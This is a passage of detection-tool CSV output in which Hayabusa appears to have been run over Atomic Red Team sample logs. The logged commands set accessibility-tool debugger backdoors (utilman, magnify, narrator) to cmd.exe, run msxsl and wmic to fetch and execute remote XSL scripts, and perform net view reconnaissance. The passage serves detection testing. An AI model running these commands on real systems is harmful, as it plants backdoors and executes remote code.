C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6156 | PGUID: 747F3D96-D8A2-5D31-0000-00108A8F3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:10.282 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 2272 | PGUID: 
747F3D96-D8A2-5D31-0000-0010D5913200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:10.295 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2272 | PGUID: 747F3D96-D8A2-5D31-0000-0010D5913200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:10.295 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:10.295 +00:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_sysmon/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:10.324 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2484 | PGUID: 747F3D96-D8A2-5D31-0000-0010D8943200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:13.109 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t 
REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4212 | PGUID: 747F3D96-D8A5-5D31-0000-0010729B3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:13.127 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D8A5-5D31-0000-0010C39D3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:13.153 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5000 | PGUID: 747F3D96-D8A5-5D31-0000-0010C39D3200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:13.153 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:13.153 
+00:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_sysmon/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:13.185 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6116 | PGUID: 747F3D96-D8A5-5D31-0000-0010C0A03200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:14.678 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-D8A6-5D31-0000-001053A73200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:14.692 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5972 | PGUID: 
747F3D96-D8A6-5D31-0000-0010A5A93200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:14.716 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5972 | PGUID: 747F3D96-D8A6-5D31-0000-0010A5A93200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:14.716 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:14.716 +00:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_sysmon/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:14.827 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6664 | PGUID: 747F3D96-D8A6-5D31-0000-0010F9B13200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:17.941 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger 
/t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6068 | PGUID: 747F3D96-D8A9-5D31-0000-001072C43200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:17.963 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5124 | PGUID: 747F3D96-D8A9-5D31-0000-0010C0C63200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:17.990 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5124 | PGUID: 747F3D96-D8A9-5D31-0000-0010C0C63200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:17.990 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:17.990 
+00:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_sysmon/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:18.009 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6016 | PGUID: 747F3D96-D8AA-5D31-0000-0010C0C93200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:19.467 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6244 | PGUID: 747F3D96-D8AB-5D31-0000-001054D03200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:19.491 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5632 | PGUID: 
747F3D96-D8AB-5D31-0000-0010A5D23200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:19.516 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5632 | PGUID: 747F3D96-D8AB-5D31-0000-0010A5D23200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:19.516 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:19.549 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1888 | PGUID: 747F3D96-D8AB-5D31-0000-0010A4D53200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:25.376 +00:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49727 (MSEDGEWIN10.home) | Dst: 172.217.17.132:80 (ams15s30-in-f4.1e100.net) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 
+2019-07-19 14:50:25.376 +00:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/net_connection_win_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:50.046 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4004 | PGUID: 747F3D96-D8CA-5D31-0000-0010DA413300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:50.086 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6268 | PGUID: 747F3D96-D8CA-5D31-0000-0010CF443300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:53.011 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D8CC-5D31-0000-001038513300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:53.062 +00:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1852 | PGUID: 747F3D96-D8CD-5D31-0000-001047543300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:55.991 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5380 | PGUID: 747F3D96-D8CF-5D31-0000-00109B603300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:56.047 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic.exe process /FORMAT:list | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" | LID: 0x50951 | PID: 7040 | PGUID: 747F3D96-D8D0-5D31-0000-0010F3623300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:56.047 +00:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,rules/sigma/process_creation_sysmon/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:56.182 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 396 | PGUID: 
747F3D96-D8D0-5D31-0000-001034673300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:06.728 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5340 | PGUID: 747F3D96-D8DA-5D31-0000-0010D3833300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:06.753 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" | LID: 0x50951 | PID: 3220 | PGUID: 747F3D96-D8DA-5D31-0000-001029863300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:06.753 +00:00,MSEDGEWIN10,1,medium,Evas | Exec,SquiblyTwo,,rules/sigma/process_creation_sysmon/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:06.753 +00:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,rules/sigma/process_creation_sysmon/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:06.753 
+00:00,MSEDGEWIN10,1,medium,Evas,XSL Script Processing,,rules/sigma/process_creation_sysmon/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:06.888 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D8DA-5D31-0000-00100D8A3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:09.823 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4856 | PGUID: 747F3D96-D8DD-5D31-0000-0010EF923300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:09.845 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net view /domain | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" | LID: 0x50951 | PID: 3012 | PGUID: 747F3D96-D8DD-5D31-0000-001043953300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:09.845 +00:00,MSEDGEWIN10,1,low,Disc,Windows Network Enumeration,,rules/sigma/process_creation_sysmon/proc_creation_win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:09.845 +00:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe 
Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:22.314 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1988 | PGUID: 747F3D96-D8EA-5D31-0000-001030B63300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:22.333 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net view | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view"" | LID: 0x50951 | PID: 4684 | PGUID: 747F3D96-D8EA-5D31-0000-00108AB83300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:22.333 +00:00,MSEDGEWIN10,1,low,Disc,Windows Network Enumeration,,rules/sigma/process_creation_sysmon/proc_creation_win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:22.333 +00:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:34.797 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3344 | PGUID: 
